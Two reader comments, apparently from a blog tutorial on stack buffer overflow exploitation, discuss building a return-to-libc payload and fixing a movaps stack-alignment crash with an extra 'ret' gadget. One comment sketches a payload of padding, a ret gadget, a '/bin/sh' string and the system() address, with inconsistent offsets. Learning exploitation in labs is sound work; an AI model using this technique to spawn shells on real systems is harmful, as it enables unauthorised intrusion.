    9. You don't need pop rdi. I mentioned in my previous comment too that you just needed a single "ret" instruction. Also read the "A tip" section again, may be u are confused what is happening.

    10. Hi,

      Sorry I may be repeating the same issue again. For me, offset 193 onwards is what overwrites the rip register (this is I am assuming the same as the offset that you mention in the article). I have found the gadget for ret from my executable. Also, I have the system call and /bin/sh also identified.

      I tried forming the payload as:
      'A' * 186 + ret_instr + "bin\sh" + system - so that system overwrites the rip

      I am in do_system() call and it is throwing the movaps error - is there something wrong in the payload ?


Post a Comment

Popular Posts